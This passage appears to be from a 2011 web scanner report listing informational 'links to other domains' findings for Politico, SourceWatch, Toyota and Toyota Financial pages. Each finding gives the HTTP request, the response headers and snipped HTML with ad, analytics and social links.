target="_blank">&nbsp;IntellectualPropertyCrossing</a>| <a href="http://www.InternshipCrossing.com" 
target="_blank">&nbsp;InternshipCrossing</a>| <a href="http://www.J2EECrossing.com" target="_blank">&nbsp;J2EECrossing</a>| <a href="http://www.jd2b.com" target="_blank">&nbsp;JD2B</a>| <a href="http://www.jdjournal.com" target="_blank">&nbsp;JDJournal</a>| <a href="http://www.JournalismCrossing.com" target="_blank">&nbsp;JournalismCrossing</a>| <a href="http://www.judged.com" target="_blank">&nbsp;Judged</a>| <a href="http://www.lawcrossing.com" target="_blank">&nbsp;LawCrossing</a>| <a href="http://www.lawfirmstaff.com" target="_blank">&nbsp;Law Firm Staff</a>| <a href="http://www.lawschoolloanreport.org" target="_blank">&nbsp;Law School Loan Report</a>| <a href="http://www.lawschoolloans.com" target="_blank">&nbsp;Law School Loans</a>| <a href="http://www.LegalAuthorityFinancial.com" target="_blank">&nbsp;Legal Authority Financial</a>| <a href="http://www.LogisticsCrossing.com" target="_blank">&nbsp;LogisticsCrossing</a>| <a href="http://www.ManagerCrossing.com" target="_blank">&nbsp;ManagerCrossing</a>| <a href="http://www.ManufacturingCrossing.com" target="_blank">&nbsp;ManufacturingCrossing</a>| <a href="http://www.marketingcrossing.com" target="_blank">&nbsp;MarketingCrossing</a>| <a href="http://www.MediaJobCrossing.com" target="_blank">&nbsp;MediaJobCrossing</a>| <a href="http://www.medicalschoolloans.com" target="_blank">&nbsp;Medical School Loans</a>| <a href="http://www.MilitaryCrossing.com" target="_blank">&nbsp;MilitaryCrossing</a>| <a href="http://www.NursingCrossing.com" target="_blank">&nbsp;NursingCrossing</a>| <a href="http://www.OccupationalTherapyCrossing.com" target="_blank">&nbsp;OccupationalTherapyCrossing</a>| <a href="http://www.operationscrossing.com" target="_blank">&nbsp;OperationsCrossing</a>| <a href="http://www.PartTimeCrossing.com" target="_blank">&nbsp;PartTimeCrossing</a>| <a href="http://www.PharmaceuticalCrossing.com" target="_blank">&nbsp;PharmaceuticalCrossing</a>| <a href="http://www.PhysicalSecurityCrossing.com" 
target="_blank">&nbsp;PhysicalSecurityCrossing</a>| <a href="http://www.PhysicalTherapyCrossing.com" target="_blank">&nbsp;PhysicalTherapyCrossing</a>| <a href="http://www.PlanningCrossing.com" target="_blank">&nbsp;PlanningCrossing</a>| <a href="http://www.PostDoctoralFellowCrossing.com" target="_blank">&nbsp;PostdoctoralFellowCrossing</a>| <a href="http://www.prcrossing.com" target="_blank">&nbsp;PRCrossing</a>| <a href="http://www.preferredresumes.com" target="_blank">&nbsp;Preferred Resumes</a>| <a href="http://www.ProcurementCrossing.com" target="_blank">&nbsp;ProcurementCrossing</a>| <a href="http://www.ProductManagerCrossing.com" target="_blank">&nbsp;ProductManagerCrossing</a>| <a href="http://www.projectmanagementcrossing.com" target="_blank">&nbsp;ProjectManagementCrossing</a>| <a href="http://www.PublicInterestCrossing.com" target="_blank">&nbsp;PublicInterestCrossing</a>| <a href="http://www.PublishingCrossing.com" target="_blank">&nbsp;PublishingCrossing</a>| <a href="http://www.PurchasingCrossing.com" target="_blank">&nbsp;PurchasingCrossing</a>| <a href="http://www.qaqccrossing.com" target="_blank">&nbsp;QAQCCrossing</a>| <a href="http://www.RadioCrossing.com" target="_blank">&nbsp;RadioCrossing</a>| <a href="http://www.realestateandlandcrossing.com" target="_blank">&nbsp;RealEstateAndLandCrossing</a>| <a href="http://www.RecruitingCrossing.com" target="_blank">&nbsp;RecruitingCrossing</a>| <a href="http://www.ResearchingCrossing.com" target="_blank">&nbsp;ResearchingCrossing</a>| <a href="http://www.RetailCrossing.com" target="_blank">&nbsp;RetailCrossing</a>| <a href="http://www.sciencescrossing.com" target="_blank">&nbsp;SciencesCrossing</a>| <a href="http://www.ScientistCrossing.com" target="_blank">&nbsp;ScientistCrossing</a>| <a href="http://www.sellingcrossing.com" target="_blank">&nbsp;SellingCrossing</a>| <a href="http://www.SQLCrossing.com" target="_blank">&nbsp;SQLCrossing</a>| <a href="http://www.TeenagerCrossing.com" 
target="_blank">&nbsp;TeenagerCrossing</a>| <a href="http://www.TelecomCrossing.com" target="_blank">&nbsp;TelecomCrossing</a>| <a href="http://www.TradingCrossing.com" target="_blank">&nbsp;TradingCrossing</a>| <a href="http://www.TrainingCrossing.com" target="_blank">&nbsp;TrainingCrossing</a>| <a href="http://www.TransportationCrossing.com" target="_blank">&nbsp;TransportationCrossing</a>| <a href="http://www.TravelingCrossing.com" target="_blank">&nbsp;TravelingCrossing</a>| <a href="http://www.TruckingCrossing.com" target="_blank">&nbsp;TruckingCrossing</a>| <a href="http://www.TVCrossing.com" target="_blank">&nbsp;TVCrossing</a>| <a href="http://www.UnderWritingCrossing.com" target="_blank">&nbsp;UnderwritingCrossing</a>| <a href="http://www.VeterinaryCrossing.com" target="_blank">&nbsp;VeterinaryCrossing</a>| <a href="http://www.VolunteerCrossing.com" target="_blank">&nbsp;VolunteerCrossing</a>| <a href="http://www.WorkAtHomeCrossing.com" target="_blank">&nbsp;WorkAtHomeCrossing</a>| <a href="http://www.WritingCrossing.com" target="_blank">&nbsp;WritingCrossing</a>
...[SNIP]...

14.16. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politico.com
Path:   /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html?showall HTTP/1.1
Host: www.politico.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 29 Dec 2010 21:27:36 GMT
ETag: "905e32-10030-3ce38200"
Content-Type: text/html
Cache-Control: max-age=0
Expires: Fri, 21 Jan 2011 23:39:55 GMT
Date: Fri, 21 Jan 2011 23:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   xmlns:og="http://ope
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7bhLrd63bC8jI&callback=qc_callback"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2473"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=1;tile=1;sz=728x90, 900x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=1;tile=1;sz=728x90, 900x90;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<div id="topPromoArea"> <a href="http://www.politicopro.com" title="POLITICO Pro" target="_blank"><img src="http://images.politico.com/global/promotion/politico_pro_special_section.jpg" border="0" alt="POLITICO Pro" />
...[SNIP]...
<li><a href="http://www.cafepress.com/thepolitico">Store</a>
...[SNIP]...
<p><a href="http://online.wsj.com/article/SB10001424052970203568004576043894046208056.html?KEYWORDS=Assange">The Wall Street Journal reports</a>
...[SNIP]...
<div class="fb-like">
                   
                   <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html&layout=standard&show_faces=false&width=250&action=recommend&font&colorscheme=light" scrolling="no" frameborder="0" style="border:none; overflow: visible; width:447px; height:50px;" allowTransparency="true"></iframe>
...[SNIP]...
<li class="shr-addthis"><a onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this,'','http%3A%2F%2Fwww%2Epolitico%2Ecom%2Fblogs%2Fonmedia%2F1210%2FAssanges%5Fmemoir%5Fadvance%5Ftops%5F1%5Fmillion%2Ehtml','POLITICO%3A%20Assange%E2%80%99s%20memoir%20advance%20tops%20%241%20million%20%2D%20On%20Media%20%2D%20Assange%E2%80%99s%20memoir%20advance%20tops%20%241%20million')" href="http://www.addthis.com/bookmark.php"><img width="83" height="16" alt="" src="http://s9.addthis.com/button0-bm.gif"/></a></li>
   </ul>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=1;tile=2;sz=300x250, 300x600;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=1;tile=2;sz=300x250, 300x600;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
</strong>: <a href="http://www.twitter.com/keachhagey">keachhagey</a>
...[SNIP]...
</div>

   
   <a class="sb-button" href="http://itunes.apple.com/app/politico-for-ipad/id406349184?mt=8" title="iPad application button" target="_blank"><img src="http://images.politico.com/global/promotion/101210_ipadbutton2_side.jpg" border="0" width="336" alt="iPad application button" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=2;tile=3;sz=300x250, 300x600, 1x1;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=2;tile=3;sz=300x250, 300x600, 1x1;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=3;tile=4;sz=160x600, 300x250, 300x600, 1x1;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=3;tile=4;sz=160x600, 300x250, 300x600, 1x1;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<li><a href="http://attackerman.firedoglake.com/">Attackerman</a>
...[SNIP]...
<li><a href="http://www.bloggasm.com/">Bloggasm</a>
...[SNIP]...
<li><a href="http://www.businessinsider.com/">Business Insider</a>
...[SNIP]...
<li><a href="http://mediamatters.org/countyfair/">County Fair</a>
...[SNIP]...
<li><a href="http://nymag.com/daily/intel/">Daily Intel</a>
...[SNIP]...
<li><a href="http://www.dankennedy.net/">Dan Kennedy</a>
...[SNIP]...
<li><a href="http://thephoenix.com/MediaLog/">Dont Quote Me</a>
...[SNIP]...
<li><a href="http://www.editorandpublisher.com/eandp/index.jsp">Editor & Publisher</a>
...[SNIP]...
<li><a href="http://www.mediabistro.com/fishbowldc/">FishbowlDC</a>
...[SNIP]...
<li><a href="http://www.mediabistro.com/fishbowlny/">FishbowlNY</a>
...[SNIP]...
<li><a href="http://gawker.com/">Gawker</a>
...[SNIP]...
<li><a href="http://www.salon.com/opinion/greenwald/">Glenn Greenwald</a>
...[SNIP]...
<li><a href="http://theplumline.whorunsgov.com/">Greg Sargent</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/media/">Huffington Post -Media</a>
...[SNIP]...
<li><a href="http://insidecablenews.wordpress.com/">Inside Cable News</a>
...[SNIP]...
<li><a href="http://www.dailyfinance.com/bloggers/jeff-bercovici/">Jeff Bercovici</a>
...[SNIP]...
<li><a href="http://topics.marketwatch.com/Journalists/F/Jon_Friedman/">Jon Friedman</a>
...[SNIP]...
<li><a href="http://mediadecoder.blogs.nytimes.com/">Media Decoder</a>
...[SNIP]...
<li><a href="http://mediamatters.org/">Media Matters</a>
...[SNIP]...
<li><a href="http://www.mediaite.com/">Mediaite</a>
...[SNIP]...
<li><a href="http://www.newser.com/off-the-grid/news.html">Michael Wolff</a>
...[SNIP]...
<li><a href="http://www.niemanlab.org/">Nieman Journalism Lab</a>
...[SNIP]...
<li><a href="http://deadlinehollywooddaily.com/">Nikki Finke</a>
...[SNIP]...
<li><a href="http://media.nationalreview.com/">NRO Media Blog</a>
...[SNIP]...
<li><a href="http://www.observer.com/media?sort=featured">NYO (Media)</a>
...[SNIP]...
<li><a href="http://www.nytpick.com/">NYTPicker</a>
...[SNIP]...
<li><a href="http://paidcontent.org/">paidContent</a>
...[SNIP]...
<li><a href="http://mediamemo.allthingsd.com/">Peter Kafka</a>
...[SNIP]...
<li><a href="http://www.mije.org/richardprince/">Richard Prince</a>
...[SNIP]...
<li><a href="http://www.poynter.org/column.asp?id=45">Romenesko</a>
...[SNIP]...
<li><a href="http://www.alleyinsider.com/">Silicon Alley Insider</a>
...[SNIP]...
<li><a href="http://mediamatters.org/strupp/">Strupp</a>
...[SNIP]...
<li><a href="http://www.theawl.com/">The Awl</a>
...[SNIP]...
<li><a href="http://www.mediabistro.com/tvnewser/">TVNewser</a>
...[SNIP]...
<li><a href="http://wonkette.com/">Wonkette</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=10;tile=6;sz=1x1;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=10;tile=6;sz=1x1;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
</script><script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<li><a href="http://www.cafepress.com/thepolitico">Store</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<div><a href="http://www.quantcast.com/p-7bhLrd63bC8jI" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-7bhLrd63bC8jI.gif" style="display: none;" border="0" height="0" width="0" alt="Quantcast" /></a>
...[SNIP]...

14.17. http://www.sourcewatch.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sourcewatch.org
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /index.php?title=Vinson_%26_Elkins_LLP HTTP/1.1
Host: www.sourcewatch.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:45:29 GMT
Server: Apache/2.2.17
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=swatch_sw1151Token;string-contains=swatch_sw1151LoggedOut;string-contains=swatch_sw1151_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Thu, 23 Dec 2010 14:09:30 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</b> is a Houston, Texas-based "worldwide operation with over 700 lawyers in 11 offices across the globe." <a href="http://www.vinson-elkins.com/overview/overview.asp" class="external autonumber" title="http://www.vinson-elkins.com/overview/overview.asp" rel="nofollow">[1]</a>
...[SNIP]...
onmental metrics, green building, electronic waste, Clear Skies and air quality, stewardship and sustainability. He also represented the White House at the COP6 bis in Bonn in 2001 on climate change." <a href="http://www.vinson-elkins.com/lawyers/lawyer_detail.asp?H4AttyID=000322375301" class="external autonumber" title="http://www.vinson-elkins.com/lawyers/lawyer_detail.asp?H4AttyID=000322375301" rel="nofollow">[2]</a>
...[SNIP]...
</a> the "National Good Government Fund", a qualifying non-party PAC, <a href="http://www.leadershipinstitute.org/pac/detailPAC.cfm?id=C00032797" class="external text" title="http://www.leadershipinstitute.org/pac/detailPAC.cfm?id=C00032797" rel="nofollow">contributed</a>
...[SNIP]...
<br />
Web: <a href="http://www.vinson-elkins.com" class="external free" title="http://www.vinson-elkins.com" rel="nofollow">http://www.vinson-elkins.com</a>
...[SNIP]...
<li><a href="http://www.tpj.org/page_view.jsp?pageid=103&amp;pubid=46" class="external text" title="http://www.tpj.org/page_view.jsp?pageid=103&amp;pubid=46" rel="nofollow">"Dollar Docket #18: High Court's Top Donor Bucks Disclosure Law. Vinson &amp; Elkins' PAC disclosures incomplete,"</a>
...[SNIP]...
<li><a href="http://www.tpj.org/page_view.jsp?pageid=97&amp;pubid=40" class="external text" title="http://www.tpj.org/page_view.jsp?pageid=97&amp;pubid=40" rel="nofollow">"Dollar Docket #24: High Court Candidates Raise $1 Million A Seat. TLR, TMA, big firms lead donors,"</a>
...[SNIP]...
<li>Nathan Newman, <a href="http://www.knowthecandidates.org/ktc/BushGang/albertogonzalesexpose.htm" class="external text" title="http://www.knowthecandidates.org/ktc/BushGang/albertogonzalesexpose.htm" rel="nofollow">"Alberto Gonzales, White House General Counsel. Controversy Surrounds Texas Justices Acceptance of Donations and Rulings for Cheney Firm,</a>
...[SNIP]...
</a>, <a href="http://www.newsmax.com/articles/?a=1996/8/07/222330" class="external text" title="http://www.newsmax.com/articles/?a=1996/8/07/222330" rel="nofollow">"Ex-Prosecutor Moves to Firm Tied to Whitewater,"</a>
...[SNIP]...
<li><a href="http://www.opensecrets.org/pressreleases/july22_99_release.htm" class="external text" title="http://www.opensecrets.org/pressreleases/july22_99_release.htm" rel="nofollow">"Bundles Proliferate in Latest Presidential Filings. Bush Leads the Pack with Ten Firms Giving $70,000 or More,"</a>
...[SNIP]...
<li>David Lazarus, <a href="http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2002/02/15/BU132842.DTL" class="external text" title="http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2002/02/15/BU132842.DTL" rel="nofollow">"Spotlight on Enron's law firm,"</a>
...[SNIP]...
<li>kos, <a href="http://www.dailykos.com/story/2004/4/22/1551/39504" class="external text" title="http://www.dailykos.com/story/2004/4/22/1551/39504" rel="nofollow">"More on O'Neill and Margaret Wilson,"</a>
...[SNIP]...
<li id="n-Please-Donate"><a href="https://salsa.democracyinaction.org/o/632/t/10397/shop/custom.jsp?donate_page_KEY=6325">Please Donate</a>
...[SNIP]...
<li id="n-About-PRWatch"><a href="http://www.prwatch.org/cmd/Help+Fight+Spin">About PRWatch</a>
...[SNIP]...
<li id="n-About-the-Center-for-Media-.26-Democracy"><a href="http://www.prwatch.org/cmd/index.html">About the Center for Media &amp; Democracy</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="/skins/common/images/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" />
...[SNIP]...
<!-- Served in 0.044 secs. --><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

14.18. http://www.toyota.com/Specials/specialOffersPage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /Specials/specialOffersPage.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Specials/specialOffersPage.aspx?siteid=tcom_hp_mktlnk_ShopCurrentOffers HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.buyatoyota.com?s_van=http://www.toyota.com/Specials&ref=
Content-Length: 255
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Expires: Fri, 21 Jan 2011 19:54:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:54:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.buyatoyota.com?s_van=http://www.toyota.com/Specials&amp;ref=">here</a>
...[SNIP]...

14.19. http://www.toyota.com/owners/apps/maintenance-guides.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /owners/apps/maintenance-guides.do

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /owners/apps/maintenance-guides.do?siteid=tcom_btmnav_owners_scheduledmaintenance HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 19:53:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_TOYOWN=ZBN1N5kRQWyyk34L245XvDFQcccTTq8GFWfnJZXkn1ML6vnH5Js5!1383648285; path=/
Content-Length: 68206


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<li class="even">
                   <a id="global_local_specials" href="http://www.buyatoyota.com/NationalLanding.aspx" target="_blank">Local Specials</a>
...[SNIP]...
<li class="even">
               <a href="http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=bk_PaymentEstimator&_nfls=true&external=true&referrer=TYT" target="_blank" id="bottomnav_shopping_EstimatePayments">
                   Estimate Payments
               </a>
...[SNIP]...
<li class="even">
               <a href="https://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome&_nfls=true&referrer=TYT" target="_blank" >
                   My TFS Account
               </a>
...[SNIP]...
<li class="even">
       <a href="http://www.toyotacertified.com/" target="_blank" >
           Toyota Certified Used Vehicles
       </a>
...[SNIP]...
<li class="even">
   <a href="http://www.toyotaracing.com/" target="_blank">
       Toyota Racing
   </a>
...[SNIP]...
<li class="even">
           <a href="http://www.toyotamobility.com/index.html" target="_blank">
               Toyota Mobility Program
           </a>
...[SNIP]...
</a>
    &nbsp;
    <a href="http://www.facebook.com/toyota" target="_blank" style="text-decoration: none;" >
       <img src="/pub-share/img/mytoyota/redesign/facebook_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a>
    <a href="http://twitter.com/toyota" target="_blank" style="text-decoration: none;" >
       <img src="/pub-share/img/mytoyota/redesign/twitter_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a>
    <a href="http://www.youtube.com/ToyotaUSA" target="_blank" style="text-decoration: none;">
       <img src="/pub-share/img/mytoyota/redesign/U_tube_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a> |
       <a href="http://www.toyotafinancial.com/consumer/tfs.portal" class="footer_copy_a" target="_blank">TOYOTA FINANCIAL SERVICES</a>
...[SNIP]...

14.20. http://www.toyota.com/owners/apps/manuals.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /owners/apps/manuals.do

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /owners/apps/manuals.do?siteid=too_toyota_manuals HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 19:53:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_TOYOWN=7BVSN5kTxvfKXnk2NQTyyL1y5Lsl6Rvd2Y2KQlCmfL5QMGW155hQ!251098632; path=/
Content-Length: 34028


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<li class="even">
                   <a id="global_local_specials" href="http://www.buyatoyota.com/NationalLanding.aspx" target="_blank">Local Specials</a>
...[SNIP]...
<li class="even">
               <a href="http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=bk_PaymentEstimator&_nfls=true&external=true&referrer=TYT" target="_blank" id="bottomnav_shopping_EstimatePayments">
                   Estimate Payments
               </a>
...[SNIP]...
<li class="even">
               <a href="https://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome&_nfls=true&referrer=TYT" target="_blank" >
                   My TFS Account
               </a>
...[SNIP]...
<li class="even">
       <a href="http://www.toyotacertified.com/" target="_blank" >
           Toyota Certified Used Vehicles
       </a>
...[SNIP]...
<li class="even">
   <a href="http://www.toyotaracing.com/" target="_blank">
       Toyota Racing
   </a>
...[SNIP]...
<li class="even">
           <a href="http://www.toyotamobility.com/index.html" target="_blank">
               Toyota Mobility Program
           </a>
...[SNIP]...
</a>
    &nbsp;
    <a href="http://www.facebook.com/toyota" target="_blank" style="text-decoration: none;" >
       <img src="/pub-share/img/mytoyota/redesign/facebook_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a>
    <a href="http://twitter.com/toyota" target="_blank" style="text-decoration: none;" >
       <img src="/pub-share/img/mytoyota/redesign/twitter_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a>
    <a href="http://www.youtube.com/ToyotaUSA" target="_blank" style="text-decoration: none;">
       <img src="/pub-share/img/mytoyota/redesign/U_tube_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a> |
       <a href="http://www.toyotafinancial.com/consumer/tfs.portal" class="footer_copy_a" target="_blank">TOYOTA FINANCIAL SERVICES</a>
...[SNIP]...

14.21. http://www.toyotafinancial.com/consumer/tfs.portal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=Sqg8N5JMcDWfGQfQzvnPB9JVL2Y2lGB1DT89xfDpn1k25JlvJ7Y9!2112344406!-1300457433; path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services: Estimate Monthly Payme
...[SNIP]...
</a>
|


<a href="http://www.toyota.com" class="h" target="_blank" style="text-decoration: none;">
Toyota.com
</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://ad.doubleclick.net/adj/N2724.deduped_spotlight/B3720575.3;abr=!ie;sz=1x1;TAG=TFS_Total_Qualified_Traffic;ord=%n?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

14.22. http://www.toyotafinancial.com/consumer/tfs.portal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /consumer/tfs.portal?referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:54:40 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
</a>
|
<a href="http://www.toyota.com" target="_default" class="b">
Toyota.com</a>
...[SNIP]...
<NOSCRIPT>
